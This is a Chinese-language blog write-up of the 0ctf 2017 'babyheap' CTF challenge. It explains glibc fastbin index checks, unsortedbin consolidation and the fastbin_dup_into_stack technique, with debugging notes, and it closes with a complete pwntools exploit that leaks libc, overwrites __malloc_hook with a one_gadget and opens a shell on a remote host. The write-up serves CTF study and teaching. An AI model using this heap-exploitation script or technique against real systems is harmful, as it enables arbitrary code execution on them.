0ctf_2017_babyheap-fastbin_dup_into_stack

已于 2023-05-19 22:27:01 修改
阅读量391 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2023-05-19 00:18:55 首次发布
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/130737470
版权

参考:
[1]https://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html
[2]https://blog.csdn.net/qq_43935969/article/details/115877748
[3]https://bbs.kanxue.com/thread-223461.htm
题目下载参考[1]

说明下如何调试堆,在payload中下断点:

gdb.attach()
....
pause()

通过gdb.attach()+pause()构成一个断点。

本人尝试的其它方式都无法在payload中下断成功。如有知道的师傅欢迎在评论区分享。

补充知识点

补充点1:malloc 的错误检查

特别是针对 fastbin 的内存块的错误检查。检查代码如下:

if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
    errstr = "malloc(): memory corruption (fast)";
errout:
    malloc_printerr(check_action, errstr, chunk2mem(victim), av);
    return NULL;
}

fastbin_index(chunksize(victim)) 表示计算给定内存块 victim 的大小,并根据大小计算其应该位于哪个 fastbin 中。这里使用 fastbin_index 函数来计算 fastbin 索引。(我们即可根据fastbin_freelist的顺序得出fastbin_index,然后伪造

idx 是预期的 fastbin 索引,用于检查内存块是否位于正确的 fastbin 中。

__builtin_expect 是一个编译器内置的函数,用于提示分支预测器。这里使用了非零的期望值,表示不希望 fastbin_index(chunksize(victim)) != idx 这个条件成立。这样可以提高分支预测的准确性和性能。

如果 fastbin_index(chunksize(victim)) != idx 成立(即内存块不在正确的 fastbin 中),则执行以下操作:

将错误信息字符串 “malloc(): memory corruption (fast)” 赋值给 errstr。
跳转到 errout 标签处。
调用 malloc_printerr 函数来打印错误消息,该函数用于处理 malloc 错误和打印相应的错误信息。
返回 NULL,表示分配失败。
总结起来,这段代码是在检查 fastbin 内存块分配过程中是否存在内存损坏的情况。如果发现内存块不在正确的 fastbin 中,将打印错误消息并返回 NULL,表示分配失败。这是一种用于确保内存分配过程的数据一致性和错误检测的机制。

补充点2:[3]查看其 chunksize 与相应的 fastbin_index 是否匹配,实际上 chunksize 的计算方法是 victim->size & ~(SIZE_BITS)),而它对应的 index 计算方法为 (size) >> (SIZE_SZ == 8 ? 4 : 3) - 2,这里 64位的平台对应的 SIZE_SZ 是8,则 fastbin_index 为 (size >> 4) - 2,那么我们将 small chunk 的 size 域改写成 0x21 即可。
在 glibc 中,SIZE_BITS 的定义取决于平台的位数。对于 64 位平台,SIZE_BITS 的值是 6。这个值表示了 chunk 的大小位数。

chunksize 的计算方法为 victim->size & ~(SIZE_BITS),其中 victim->size 是 chunk 中的 size 字段。SIZE_BITS 是为了去除 chunk 的标志位(prev_in_use 和 non_main_arena)所占用的位数,以获取实际的 chunk 大小。

fastbin_index 的计算方法为 (size) >> (SIZE_SZ == 8 ? 4 : 3) - 2。这里的 size 是指 chunksize 函数返回的 chunk 大小,SIZE_SZ 是指 glibc 中 size_t 的大小,64 位平台下 SIZE_SZ 是 8。因此,fastbin_index 的计算公式为 (size >> 4) - 2。

通过将 small chunk 的 size 域改写成 0x21,可以使得 fastbin_index 的结果为 0,将该 chunk 放入对应的 fastbin 链表中。

需要注意的是,以上是对 glibc 的默认实现进行的解释,具体的实现细节可能因不同版本、编译选项或修改而有所差异。

补充点3:当只有一个 small/large chunk 被释放时,small/large chunk 的 fd 和 bk 指向 main_arena 中的地址

补充点4:何为consolidate
参考:https://blog.51cto.com/u_15346415/3691307

  • 大于0x80的chunk被释放之后就放到了unsortedbin上面去,但是unsortedbin是一个未分类的bin,上面的chunk也处于未分类的状态。但是这些chunk需要在特定的条件下被整理然后放入到smallbins或者largebins中

  • 这个整理的过程被称为unsortedbin的“consolidate”,但是“consolidate”是要在特定的条件下才会发生的,并且与malloc紧密相关。

fastbin_dup_into_stack手法的目的

泄露地址
实现任意地址写

0ctf_2017_babyheap

此题利用fastbin_dup_into_stack方法,因此需要考虑:
如何泄露地址?
补充点3实现
如何实现任意地址写?
fastbin_dup实现

需要绕过的点:
防止malloc检测fastbin_index;
防止malloc时候consolidate;

调试

开启的保护:
在这里插入图片描述

断点1:
在这里插入图片描述&mian_arena中放置着指向fastbin[index]的起始值

free(1)和free(2)目的:为了chunk2的fd能填充,因为fastbin中只有一个的话fd无指向,而我们需要构造的就是fd。通过chunk0来溢出写入free的chunk1和chunk2,操作中只修改的chunk的fd最后一个字节。

断点2:
此步目的:通过溢出绕过malloc_check_fastbin[index]检查,及伪造chunk2的fd的最后一字节。
也可得出为什么首先需要分配五个chunk0~chunk5,少一个都不行。

在这里插入图片描述绿色:绕过malloc_check_fastbin[index]
前面已经把chunk4控制到了free_fastbin中了,我们需要malloc获取它,但是需要绕过检查,所以溢出实现smallbin伪装成fastbin。

根据bins显示出fastbin[0x20~0x80],我们的chunk都处于fastbin[1],所以把index=1带入公式

fastbin_index = (size >> 4) - 2

得出size = 0x31

断点3:
目的:为泄露做准备,把fastbin改回smallbin,smallbin在free后才能链接填充(fd和bk)泄露libc地址。
在这里插入图片描述恢复smallbin,使它下一步free后进入smallbin,泄露libc地址。

在堆漏洞利用中,通常会通过泄露 libc 地址来获取 libc 的基址,然后计算其他函数或符号的地址。一种常见的方法是使用 __malloc_hook 符号来计算 libc 的基址;
__malloc_hook 是 libc 中的一个全局变量,用于控制堆分配函数 malloc() 的行为。通过泄露 __malloc_hook 的地址,我们可以计算 libc 的基址。通常,可以使用 one_gadget 或者 libc-database 等工具来查找适合当前 libc 版本的 RCE(Remote Code Execution) gadget;
__malloc_hook 与&main_arena偏移固定;

断点4:
目的:防止malloc时候consolidate;
在这里插入图片描述这里alloc(0x80)至关重要,防止空闲块相邻也空闲导致和并consolidate;
还有一个细节free(chunk4)未显示进入smallbin,而是进入到unsortbin,之后才会进入到smallbin,至于为什么请参考补充点4

这块光理论还是比较绕的,实际中根据调式结果为准即可,下面对比未继续alloc(0x80)[大小不是非得0x80]发生了consolidate的结果:
在这里插入图片描述未获得smallbin,当然也没获得fd和bk,即无法获取libc地址。

断点5:
目的:这里alloc(0x68)中0x68大小是有讲究的,为了配合malloc_hook的地址绕过绕过malloc_check_fastbin[index]。
在这里插入图片描述
把chunk4一份为2,已分配的chunk+ free的chunk,
chunk4 = chunk_0x71 + free[chunk_0x21]
为下一步实现fastbin_dup做准备。

断点6:
目的:为下一步实现fastbin_dup_into_stack做准备,把合适大小的chunk放入合适大小的free_bin中。
在这里插入图片描述free(0x90) = free[chunk_0x71] + double free[chunk_0x21]
实现fastbin_dup:但这里后续并没用到
重点!!!最终构造目的:
这里我们要的就是free[chunk_0x71],上面所有的操作就是为了它,它就是合适大小的chunk

断点7:
目的:写入需要执行的函数地址即可,比如system。
在这里插入图片描述这里为什么是fill(2):中间之前分配的chunk都被free了。
此步实现了控制任意地址读写:fastbin_dup_into_stack

断点8:
最后再Malloc(0x60)两次即可获得构造地址,
由于我这里开了ASLR,如果关了的话直接x/30gx addr查看上次分配的地址,查看内容即可。

完整payload:

from pwn import *

context.log_level="debug"

def alloc(size):
    r.sendline('1')
    r.sendlineafter(': ', str(size))
    r.recvuntil(': ', timeout=1)

def fill(idx, data):
    r.sendline('2')
    r.sendlineafter(': ', str(idx))
    r.sendlineafter(': ', str(len(data)))
    r.sendafter(': ', data)
    r.recvuntil(': ')
    
def free(idx):
    r.sendline('3')
    r.sendlineafter(': ', str(idx))
    r.recvuntil(': ')

def dump(idx):
    r.sendline('4')
    r.sendlineafter(': ', str(idx))
    r.recvuntil(': \n')
    data = r.recvline()
    r.recvuntil(': ')
    return data

def exploit(r):
    r.recvuntil(': ')
	
    alloc(0x20)	#chunk0	0xaddr_00
    alloc(0x20)	#chunk1	0xaddr_30
    alloc(0x20)	#chunk2	0xaddr_60
    alloc(0x20)	#chunk3	0xaddr_90
    alloc(0x80)	#chunk4	0xaddr_c0

    free(1)	#chunk1 -> fastbin_chunk1
    free(2)	#chunk2	-> fastbin_chunk2
    #gdb.attach(r)	#break1
    #pause()

    payload  = p64(0)*5
    payload += p64(0x31)
    payload += p64(0)*5
    payload += p64(0x31)
    payload += p8(0xc0)	#chunk2_fd
    fill(0, payload)	# fastbin_chunk1 -> fastbin_chunk4

    payload  = p64(0)*5
    payload += p64(0x31)#bypass malloc check	| chunk4_smallbin -> chunk4_fastbin
    fill(3, payload)
    #gdb.attach(r)	#break2
    #pause()
    alloc(0x20)	#fastbin_chunk2 -> chunk2
    alloc(0x20)	#fastbin_chunk4 -> chunk4
    
    payload  = p64(0)*5
    payload += p64(0x91)	#leak_libc	|  chunk4_fastbin -> chunk4_smallbin
    fill(3, payload)
    #gdb.attach(r)	#break3
    #pause()
    alloc(0x80)		#avoid free_chunk consolidate
    free(4)		#unsortbin_chunk4 & first free(chunk4)
    
    libc_base = u64(dump(2)[:8]) - 0x3a5678
    log.info("libc_base: " + hex(libc_base))
    #gdb.attach(r)	#break4
    #pause()
    alloc(0x68)		#chunk4 = chunk_0x71 + chunk_0x21 | free_chunk4[chunk_0x21]
    #gdb.attach(r)	#break5
    #pause()
    free(4)		#free_chunk4[chunk4_0x71] & double free_chunk4[chunk_0x21] & fastbin_dup
    #gdb.attach(r)	#break6
    #pause()	
    fill(2, p64(libc_base + 0x3a55ed))	#fastbin_dup_into_stack 
    #gdb.attach(r)	#break7
    #pause()
    alloc(0x60)
    alloc(0x60)
    payload  = '\x00'*3
    payload += p64(0)*2
    payload += p64(libc_base + 0x41374)
    fill(6, payload)
    #gdb.attach(r)	#break8
    #pause()
    alloc(255)

    r.interactive()

if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        r = process(['./0ctfbabyheap'], env={"LD_PRELOAD":"./libc.so.6"})
        exploit(r)

总结一些关键点:

合适大小的chunk:free[chunk_0x71];
0x70大小是根据:为获得malloc_hook写入地址,malloc的时候绕过malloc_check_fastbin[index];
chun4_smallbin -> chun4_fastbin是为了控制fd;
chunk4_smallbin ->chunk4_fastbin 绕过malloc检查;
chun4_fastbin ->chun4_smallbin 改回来是为了泄露libc;

全是逻辑毫无感情。

hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF 2015: Search Engine-fastbin_dup_into_stack
个人笔记
05-24 736
参考: [1]https://gsgx.me/posts/9447-ctf-2015-search-engine-writeup/ [2]https://blog.csdn.net/weixin_38419913/article/details/103238963(掌握利用点,省略各种逆向细节) [3]https://bbs.kanxue.com/thread-267876.htm(逆向调试详解) [4]https://bbs.kanxue.com/thread-247219.htm(双解法) 1,三连 2
fastbin_dup_into_stack.c 调试记录
a673562566的博客
08-18 180
源码如下 int main() { fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" "returning a pointer to a controlled location (in this case, the stack).\n"); unsigned long long stack_var; fprintf(stderr, "The addres...
python function terminated un_绕过 RestrictedUnpickler
weixin_39673303的博客
12-11 349
阅读:892上周跑模型的间隙,看到一个关于 Python Pickle 反序列化的 CTF 题,和以往见到的不太一样,感觉很有意思,遂打算研究一下。0x00 Pickle 反序列化我们知道,当我们控制了如 `pickle.loads`等序列化数据的输入接口时,我们可以通过构造恶意的 Payload 来达到任意代码执行的效果。这是因为, `pickle` 库在反序列化(unpickling)的过程中...
CTF-RE 笔记汇总
逆向随笔
04-02 1921
做了笔记从来不看系列……丢云端清本地了 文章目录滴水2015-01-12(进制01)2015-01-13(进制01)2015-01-14(数据宽度_逻辑运算)2015-01-15(通用寄存器_内存读写)2015-01-16(内存地址_堆栈)2015-01-19(标志寄存器)2015-01-20(JCC补录)2015-01-23(C语言完整版)2015-01-26 (c语言02_数据类型)2015-02-05 (结构体 字节对齐)2015-02-06 (switch语句反汇编)指针位运算汇编笔记第二章 寄存器
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
「安全建设」CTF_中的密码学 - 渗透测试.zip
12-04
「安全建设」CTF_中的密码学 - 渗透测试 漏洞挖掘 安全认证 安全研究 安全培训 企业安全
CTF_Hacker-Tools-master.zip
12-26
CTF工具包
全网最硬核PWN入门_图解分析
个人笔记
04-03 5917
PWN序Linux环境下的基础知识从C源码到可执行文件的生成过程程序的编译与链接什么是可执行文件可执行文件分类PE/ELFELF文件格式区分节和段的存储区域加载ELF / 查看节和段区分布命令段(segment)与节(section)程序数据在内存中的组织分布大端序与小端序存储关键寄存器静态链接与动态链接常用汇编指令intel 和 AT&T汇编格式 序 PWN知识只有不断的重复,实践才能熟悉掌握。以下知识点以LINUX系统环境下为主要说明(Windows的会有点区别)。 Linux环境下的基础知识
buuctf(pwn
个人笔记
04-04 2619
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
2021/10/18-如何调试pwn的exp或payload
个人笔记
10-19 1605
《2021年10月18日》 【连续第18天总结】 首先需要明白的是,你调试的exp.py是你输入的内容(即程序获取用户输入的信息)。 通过exp.py脚本与程序交互执行你的输入,跟手动一次次输入并无两样,所以想通过下断点调试查看你希望看到的具体位置数据的方法是一样的。 pwn调试小技巧 pwntool工具中一些好用的模块 context.log_level="debug" //输出显示调试信息,即用户输入与程序交互的信息 context.terminal = ["tmux","splitw","-h"]
hitcontraining_uaf
个人笔记
04-28 737
8字节填充(利用点之一)=print_note_conten函数地址+print_note_content内容地址;例如一次add_note(),notelist[0]=&print_note_content。关注点:0x804b158[3] = node[0]= 0x080485fb等会被改写。一次add_note()malloc了两次,地址被notelist[]数组保存;notelist[]属于bss段全局变量,存储chunk。基本信息:x86-32-el,堆题思路;保护:Partial RELRO。
堆简介(heap)_上
个人笔记
07-18 691
堆堆的特性堆VS栈对比堆的数据结构最重要的堆表(空表 和 快表)空表快表堆管理策略 堆的特性 (1)堆是一种在程序运行时动态分配的内存。所谓动态是指所需内存的大小在程序设计时 不能预先决定,需要在程序运行时参考用户的反馈。 (2)堆在使用时需要程序员用专用函数进行申请,如 C 语言中的 malloc 等函数、C++中的 new 函数等都是最常见的分配堆内存的函数。堆内存申请有可能成功,也有可能失败,这与申 请内存的大小、机器性能和当前运行环境有关。 (3)一般用一个堆指针来使用申请得到的内存,读、写、释放都
pwnable_orw-seccomp沙箱
个人笔记
04-11 669
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
ciscn_2019_s_4-栈迁移
个人笔记
06-07 632
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要栈迁移更大的空间来构造ROP。栈迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此栈帧迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。栈迁移核心(通过ROPGadget寻找。ebp位置:栈迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:栈溢出,栈迁移。作用:赋值执行函数调用。
PWN_格式化字符串格式字符
个人笔记
03-04 507
格式化字符串格式字符 格式 含义 %c 输出字符,配上%n可用于向指定地址写数据。 %d 输出十进制整数,配上%n可用于向指定地址写数据。 %x 输出16进制数据,如%ix表示要泄漏偏移i处4字节长的16进制数据,x表示要泄漏偏移i处4字节长的16进制数据,%ix表示要泄漏偏移i处4字节长的16进制数据,lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。 %p 输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bi
[ZJCTF 2019]EasyHeap-patchlibc-调试
个人笔记
04-25 491
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18。heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];1、伪造chunk[2]=[全局地址-3];chunk[3] = [全局地址-2]通过修改chunk[3]的值 ->控制 &chunk[0] ->4、给任意地址填入内容,chunk[0] = [任意内容]3、填入控制任意地址,chunk[3] = [任意地址]chunk[3] ->实现[任意地址]写。
轩禹ctf_rsa工具用法
10-16
轩禹ctf_rsa工具是一款用于RSA加密解密的工具,使用方法如下: 1. 生成RSA密钥对 使用命令 `python3 ctf_rsa.py genkey` 可以生成一对RSA密钥,公钥和私钥会保存在当前目录下的 `public.pem` 和 `private.pem` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值